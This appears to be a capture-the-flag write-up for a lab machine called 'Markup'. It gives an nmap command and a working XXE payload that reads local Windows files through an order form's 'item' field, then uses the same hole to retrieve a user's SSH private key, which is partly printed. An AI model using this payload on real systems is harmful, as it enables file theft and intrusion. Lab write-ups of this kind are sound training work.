Markup
Personal Rating: Very Easy
Enumeration
A first nmap scan revealed a webserver on the Windows machine:
sudo nmap -sC -sV <IP>
XXE Exploit
Visiting that Server, it was to be discovered that XML formatted user input was sent to the server. I tried a simple test XXE and it worked directly:
<?xml version = "1.0"?>
<!DOCTYPE soos [ <!ENTITY xee SYSTEM "C:/Windows/win.ini"> ]>
<order>
<quantity>1</quantity>
<item>&xee;</item>
<address></address>
</order>
The loaded external entity had to be in the "item" field and the path delimiter had to be a '/' despite the machine running Windows.
Persistence
Using the XXE I could obtain the private ssh key of the user and ssh onto the machine.
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
<SNIP>
m3MVFR4sN7a1cAAAANZGFuaWVsQEVudGl0eQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
Last updated